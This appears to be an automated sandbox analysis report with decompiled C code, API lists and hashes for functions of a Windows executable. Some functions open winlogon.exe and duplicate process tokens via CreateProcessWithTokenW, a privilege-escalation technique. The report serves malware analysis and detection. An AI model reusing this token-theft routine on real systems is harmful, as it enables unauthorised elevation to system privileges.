					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                0x004041f9
                                                                                                                0x00404205
                                                                                                                0x00404208
                                                                                                                0x00404217
                                                                                                                0x0040421e
                                                                                                                0x00404236
                                                                                                                0x0040423f
                                                                                                                0x0040424a
                                                                                                                0x0040425f
                                                                                                                0x0040426b
                                                                                                                0x0040426e
                                                                                                                0x0040426e
                                                                                                                0x00404275
                                                                                                                0x004043be
                                                                                                                0x004043ce
                                                                                                                0x004043d0
                                                                                                                0x004043d3
                                                                                                                0x004043da
                                                                                                                0x004043da
                                                                                                                0x004043c0
                                                                                                                0x004043c3
                                                                                                                0x004043c3
                                                                                                                0x0040427b
                                                                                                                0x0040428c
                                                                                                                0x0040428f
                                                                                                                0x00404295
                                                                                                                0x004042a5
                                                                                                                0x004042b8
                                                                                                                0x004042cb
                                                                                                                0x004042de
                                                                                                                0x004042f1
                                                                                                                0x00404304
                                                                                                                0x00404317
                                                                                                                0x0040432a
                                                                                                                0x0040433d
                                                                                                                0x00404350
                                                                                                                0x00404363
                                                                                                                0x00404376
                                                                                                                0x00404389
                                                                                                                0x0040439c
                                                                                                                0x004043a4
                                                                                                                0x004043af
                                                                                                                0x004043b5
                                                                                                                0x004043b5
                                                                                                                0x004043f5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                0x00405b81
                                                                                                                0x00405b88
                                                                                                                0x00405b8a
                                                                                                                0x00405b8a
                                                                                                                0x00405b8f
                                                                                                                0x00405b96
                                                                                                                0x00405b9b
                                                                                                                0x00405bad
                                                                                                                0x00405bad
                                                                                                                0x00405b9d
                                                                                                                0x00405b9d
                                                                                                                0x00405ba8
                                                                                                                0x00405bab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405bab
                                                                                                                0x00405be9
                                                                                                                0x00405be9
                                                                                                                0x00405baf
                                                                                                                0x00405bb1
                                                                                                                0x00405ce2
                                                                                                                0x00405ce2
                                                                                                                0x00405bb7
                                                                                                                0x00405bbd
                                                                                                                0x00405bf6
                                                                                                                0x00405c4b
                                                                                                                0x00405c4c
                                                                                                                0x00405c52
                                                                                                                0x00405c53
                                                                                                                0x00000000
                                                                                                                0x00405bf8
                                                                                                                0x00405c02
                                                                                                                0x00405c0e
                                                                                                                0x00405c13
                                                                                                                0x00405c18
                                                                                                                0x00405c2c
                                                                                                                0x00405c2e
                                                                                                                0x00405c3b
                                                                                                                0x00405c3c
                                                                                                                0x00405c42
                                                                                                                0x00000000
                                                                                                                0x00405c1a
                                                                                                                0x00405c25
                                                                                                                0x00405c2a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405c2a
                                                                                                                0x00405c18
                                                                                                                0x00405bbf
                                                                                                                0x00405bc0
                                                                                                                0x00405bcd
                                                                                                                0x00405bce
                                                                                                                0x00405bd7
                                                                                                                0x00405c58
                                                                                                                0x00405c5f
                                                                                                                0x00405c61
                                                                                                                0x00405c61
                                                                                                                0x00405c63
                                                                                                                0x00405cdb
                                                                                                                0x00405cdb
                                                                                                                0x00405c65
                                                                                                                0x00405c65
                                                                                                                0x00405c74
                                                                                                                0x00000000
                                                                                                                0x00405c84
                                                                                                                0x00405c8a
                                                                                                                0x00405c8d
                                                                                                                0x00405c99
                                                                                                                0x00405caf
                                                                                                                0x00405cbd
                                                                                                                0x00405cc8
                                                                                                                0x00405cd4
                                                                                                                0x00405cd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405cd9
                                                                                                                0x00405c74
                                                                                                                0x00405c63
                                                                                                                0x00405ce6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                0x00401e59
                                                                                                                0x00401e5c
                                                                                                                0x00401e64
                                                                                                                0x00401e67
                                                                                                                0x00401ef9
                                                                                                                0x00401e6d
                                                                                                                0x00401e70
                                                                                                                0x00401e76
                                                                                                                0x00401e79
                                                                                                                0x00401e7e
                                                                                                                0x00401e83
                                                                                                                0x00401e92
                                                                                                                0x00401e85
                                                                                                                0x00401e8e
                                                                                                                0x00401e8e
                                                                                                                0x00401e96
                                                                                                                0x00401ee6
                                                                                                                0x00401e98
                                                                                                                0x00401e9b
                                                                                                                0x00401e9e
                                                                                                                0x00401ea3
                                                                                                                0x00401ea8
                                                                                                                0x00401ebb
                                                                                                                0x00401eaa
                                                                                                                0x00401eb7
                                                                                                                0x00401eb7
                                                                                                                0x00401ebf
                                                                                                                0x00401ed3
                                                                                                                0x00401ec1
                                                                                                                0x00401ec7
                                                                                                                0x00401ec9
                                                                                                                0x00401ec9
                                                                                                                0x00401ed8
                                                                                                                0x00401ed8
                                                                                                                0x00401eeb
                                                                                                                0x00401eeb
                                                                                                                0x00401f01

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                0x00405241
                                                                                                                0x00405250
                                                                                                                0x00405257
                                                                                                                0x0040525f
                                                                                                                0x00405262
                                                                                                                0x00405265
                                                                                                                0x00405268
                                                                                                                0x0040526f
                                                                                                                0x0040526f
                                                                                                                0x00405277
                                                                                                                0x00405277
                                                                                                                0x0040527a
                                                                                                                0x0040527f
                                                                                                                0x00405284
                                                                                                                0x00405285
                                                                                                                0x00405291
                                                                                                                0x00405296
                                                                                                                0x004052a9
                                                                                                                0x004052b3
                                                                                                                0x004052b7
                                                                                                                0x004052bc
                                                                                                                0x004052ca
                                                                                                                0x004052d2
                                                                                                                0x004052d5
                                                                                                                0x004052d8
                                                                                                                0x004052d8
                                                                                                                0x004052db
                                                                                                                0x004052db
                                                                                                                0x004052e1
                                                                                                                0x004052e4
                                                                                                                0x004052e8
                                                                                                                0x004052f2

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                0x00406157
                                                                                                                0x0040616d
                                                                                                                0x00406174
                                                                                                                0x0040617f
                                                                                                                0x00406185
                                                                                                                0x00406196
                                                                                                                0x0040619e
                                                                                                                0x004061b6
                                                                                                                0x004061bd
                                                                                                                0x004061d4
                                                                                                                0x004061da
                                                                                                                0x004061e0
                                                                                                                0x004061e5
                                                                                                                0x004061e6
                                                                                                                0x004061ef
                                                                                                                0x004061f9
                                                                                                                0x004061ff
                                                                                                                0x004061ef
                                                                                                                0x00406206

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                0x00404706
                                                                                                                0x00404714
                                                                                                                0x0040471c
                                                                                                                0x00404721
                                                                                                                0x0040472b
                                                                                                                0x00404733
                                                                                                                0x00404735
                                                                                                                0x00404735
                                                                                                                0x00404733
                                                                                                                0x00404751
                                                                                                                0x00404780
                                                                                                                0x00404753
                                                                                                                0x0040475e
                                                                                                                0x00404766
                                                                                                                0x0040476c
                                                                                                                0x00404770
                                                                                                                0x00404770
                                                                                                                0x0040478a

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                0x0040598b
                                                                                                                0x0040598b
                                                                                                                0x0040599a
                                                                                                                0x004059ae
                                                                                                                0x004059b5
                                                                                                                0x004059c1
                                                                                                                0x004059c6
                                                                                                                0x004059cb
                                                                                                                0x004059ce
                                                                                                                0x00405a7b
                                                                                                                0x00405a7b
                                                                                                                0x004059d4
                                                                                                                0x004059d4
                                                                                                                0x004059dc
                                                                                                                0x004059ee
                                                                                                                0x00000000
                                                                                                                0x004059f0
                                                                                                                0x004059f0
                                                                                                                0x004059f6
                                                                                                                0x004059f7
                                                                                                                0x004059fa
                                                                                                                0x00405a03
                                                                                                                0x00405a2b
                                                                                                                0x00405a2e
                                                                                                                0x00405a3c
                                                                                                                0x00405a40
                                                                                                                0x00000000
                                                                                                                0x00405a42
                                                                                                                0x00405a42
                                                                                                                0x00405a54
                                                                                                                0x00405a59
                                                                                                                0x00405a5a
                                                                                                                0x00405a5a
                                                                                                                0x00405a61
                                                                                                                0x00405a69
                                                                                                                0x00405a7f
